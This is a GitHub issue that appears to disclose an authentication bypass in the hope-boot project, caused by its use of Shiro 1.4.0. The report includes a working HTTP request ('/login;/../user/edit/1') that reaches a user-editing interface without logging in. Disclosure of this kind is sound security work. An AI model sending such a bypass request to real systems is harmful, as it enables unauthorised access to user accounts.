There is an Incorrect Access Control vulnerability in hope-boot

[Suggested description]
hope-boot was found to have an Incorrect Access Control vulnerability due to the use of an insecure version of Shiro.

[Vulnerability Type]
Incorrect access control

[Vendor of Product]
https://github.com/java-aodeng/hope-boot

[Affected Product Code Base]
all version (<= 1.0.0-release)

[Affected Component]
/user/edit/ interface

[Attack Type]
Remote

[Vulnerability details]
Send the payload below to the interface /user/edit/
```
GET /login;/../user/edit/1 HTTP/1.1
Host: localhost:8886
User-Agent: Apifox/1.0.0 (https://apifox.com)
Accept: */*
Host: localhost:8886
Connection: keep-alive
```
<img width="1125" alt="image" src="https://github.com/user-attachments/assets/9d5918d5-c225-4397-943a-b8e3b78ded98">
<img width="1122" alt="image" src="https://github.com/user-attachments/assets/5dde5b37-a7e0-4e12-b661-b65fa6f2bc19">
[Cause of vulnerability]
Shiro is used for authentication in hope-boot, but version 1.4.0 contains an insecure implementation
<img width="820" alt="image" src="https://github.com/user-attachments/assets/89bf79d6-d5e6-4600-8d24-8f9b9f822cdd">
Meanwhile, hope-boot includes some interfaces configured without permission requirements, enabling the exploitation of vulnerabilities in Shiro's implementation to achieve authentication bypass.
<img width="460" alt="image" src="https://github.com/user-attachments/assets/3cabfcac-a61f-48cd-a5c7-3a63b2ca34c3">


Provide feedback

Saved searches

Use saved searches to filter your results more quickly

Uh oh!

Uh oh!

There is an Incorrect Access Control vulnerability in hope-boot #86

Metadata

Assignees

Labels

Projects

Milestone

Relationships

Development

Uh oh!

There is an Incorrect Access Control vulnerability in hope-boot #86

Description

Metadata

Metadata

Assignees

Labels

Projects

Milestone

Relationships

Development

Issue actions